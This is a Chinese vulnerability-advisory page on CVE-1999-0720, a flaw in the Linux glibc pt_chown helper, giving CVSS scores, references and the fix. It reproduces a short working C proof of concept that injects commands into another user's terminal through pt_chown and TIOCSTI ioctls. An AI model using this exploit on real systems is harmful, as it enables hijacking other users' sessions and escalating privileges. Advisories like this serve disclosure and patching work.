CVE-1999-0720
CVSS4.6
发布时间 :1999-08-23 00:00:00
修订时间 :2008-09-09 08:35:16
NMCOE    

[原文]The pt_chown command in Linux allows local users to modify TTY terminal devices that belong to other users.


[CNNVD]Linux pt_chown漏洞(CNNVD-199908-047)

        基于Linux平台的pt_chown命令存在漏洞。本地用户可以修改其他用户的TTY终端设备。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0720
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0720
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-047
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=lcamtuf.4.05.9907041223290.355-300000@nimue.ids.pl
(UNKNOWN)  BUGTRAQ  19990823 [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock / mc / glibc 2.0.x
http://www.securityfocus.com/bid/597
(UNKNOWN)  BID  597

- 漏洞信息

Linux pt_chown漏洞
中危 其他
1999-08-23 00:00:00 2005-05-02 00:00:00
本地  
        基于Linux平台的pt_chown命令存在漏洞。本地用户可以修改其他用户的TTY终端设备。

- 公告与补丁

        Michal Zalewski suggested the following:
        chmod 700 /usr/libexec/pt_chown
        A complete fix is to install the newest version of GNU Libc. As of this writing (January, 19 - 2000) this version is 2.1.2 and is available via:
        ftp://ftp.gnu.org/pub/gnu/glibc/glibc-2.1.2.tar.gz

- 漏洞信息 (19467)

GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability (EDBID:19467)
linux local
1999-08-23 Verified
0 Michal Zalewski
N/A [点击下载]
source: http://www.securityfocus.com/bid/597/info

pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise.

int main(int a,char* b[]) {

char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
int i=0,x=open(b[1],1); // Expect writable, allocated
// (eg. by screen) /dev/ttyXX as 1st arg

if (x<0) {
perror(b[1]);
exit(1);
}

if (!fork()) {
dup2(x,3);
execl("/usr/libexec/pt_chown","pt_chown",0);
perror("pt_chown");
exit(1);

}
sleep(1);
for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);

} 		

- 漏洞信息

1053
Linux pt_chown Arbitrary TTY Modification
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-08-23 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站